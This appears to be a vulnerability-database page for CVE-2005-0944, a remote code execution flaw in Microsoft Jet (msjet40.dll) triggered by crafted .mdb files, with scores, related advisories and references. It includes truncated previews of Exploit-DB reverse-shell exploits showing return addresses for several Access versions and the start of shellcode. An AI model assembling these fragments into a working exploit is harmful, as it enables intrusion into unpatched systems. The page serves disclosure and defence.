CVE-2005-0944
published 2005-05-02CVE-2005-0944: Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
34.02%
98.2th percentile
Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | jet | <= 4.0.8618.0 | — |
| microsoft | jet | — | — |
| microsoft | office | — | — |
| microsoft | windows_nt | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-22g2-cxxf-8f85: Unknown vulnerability in Microsoft Jet DB engine (msjet40
ghsa_unreviewed·2022-05-01
CVE-2005-0944 [HIGH] GHSA-22g2-cxxf-8f85: Unknown vulnerability in Microsoft Jet DB engine (msjet40
Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file.
GHSA
GHSA-xm5h-r3m3-mqj4: Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-6357 [HIGH] CWE-119 GHSA-xm5h-r3m3-mqj4: Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access
Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access Database (.mdb) file. NOTE: due to the lack of details as of 20071210, it is not clear whether this issue is the same as CVE-2007-6026 or CVE-2005-0944.
GHSA
GHSA-2r22-4xgm-wjg8: Stack-based buffer overflow in Microsoft msjet40
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-6026 [HIGH] CWE-119 GHSA-2r22-4xgm-wjg8: Stack-based buffer overflow in Microsoft msjet40
Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944.
VulnCheck
Microsoft jet Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 7.5
CVE-2007-6026 [HIGH] Microsoft jet Improper Restriction of Operations within the Bounds of a Memory Buffer
Microsoft jet Improper Restriction of Operations within the Bounds of a Memory Buffer
Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944.
Affected: Microsoft jet
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-028
No detection rules found.
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
exploitdb·2005-04-22
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)
exploitdb·2005-04-12
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)
Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)
---
##################################################################
# #
# See-security Technologies ltd. #
# #
# http://www.see-security.com #
# #
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# coded by Tal zeltzer #
# #
# Based on the exploit written by S.Pearson #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1
ReturnAddress = 0x77F51B93 # Address of "jmp edx" in ntdll.dll
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x31\xc9\x83\xe9\xb7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97"
Shellcode_p1 += "\x25\xaa\xb5\x
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
exploitdb·2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
No writeups or analysis indexed.
http://blogs.securiteam.com/?p=535http://marc.info/?l=bugtraq&m=111231465920199&w=2http://www.hexview.com/docs/20050331-1.txthttp://www.kb.cert.org/vuls/id/176380http://www.securityfocus.com/archive/1/442446/100/100/threadedhttp://www.securityfocus.com/archive/1/442610/100/100/threadedhttp://blogs.securiteam.com/?p=535http://marc.info/?l=bugtraq&m=111231465920199&w=2http://www.hexview.com/docs/20050331-1.txthttp://www.kb.cert.org/vuls/id/176380http://www.securityfocus.com/archive/1/442446/100/100/threadedhttp://www.securityfocus.com/archive/1/442610/100/100/threaded
2005-05-02
Published